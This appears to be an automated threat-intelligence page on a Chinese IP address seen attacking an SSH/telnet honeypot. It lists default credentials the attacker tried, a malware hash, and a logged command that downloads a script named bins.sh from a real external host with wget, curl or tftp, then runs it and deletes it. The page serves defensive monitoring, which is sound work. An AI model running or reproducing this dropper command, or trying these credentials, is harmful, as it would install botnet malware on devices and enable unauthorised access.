Active Threat • MEDIUM

27.42.154.52

Country of Origin🇨🇳 China

First Detection4/28/2026

Last Activity4/28/2026

ISPChina Unicom IP network China169 Guangdong province

🎯

108

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇨🇳 China
City: Zhongshan
ASN: AS17816
ISP: China Unicom IP network China169 Guangdong province

Attack Types

ssh_telnet_honeypot

Attacked Ports

Associated Malware

84ece6bb20cc5f510465...→

Attempted Credentials

🔐root/root

🔐admin/admin

🔐admin/password

🔐root/(empty)

Executed Commands

$sh12x

$/bin/busybox sh6x

cd /tmp || cd /run || cd /; wget -q http://176.65.139.143:8081/cdn/content/bins.sh -O .s || curl -s -o .s http://176.65.139.143:8081/cdn/content/bins.sh || tftp -g -l .s -r /cdn/content/bins.sh 176.65.139.143 69; chmod 777 .s; sh .s; rm -f .s

URLhaus Intel1 URLsabuse.ch

This IP has used the following known malicious URLs:

http://176.65.139.143:8081/cdn/content/bins.sh

offlinemalware_download

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports

1701

Risk Assessment

/100

LowMediumHighCritical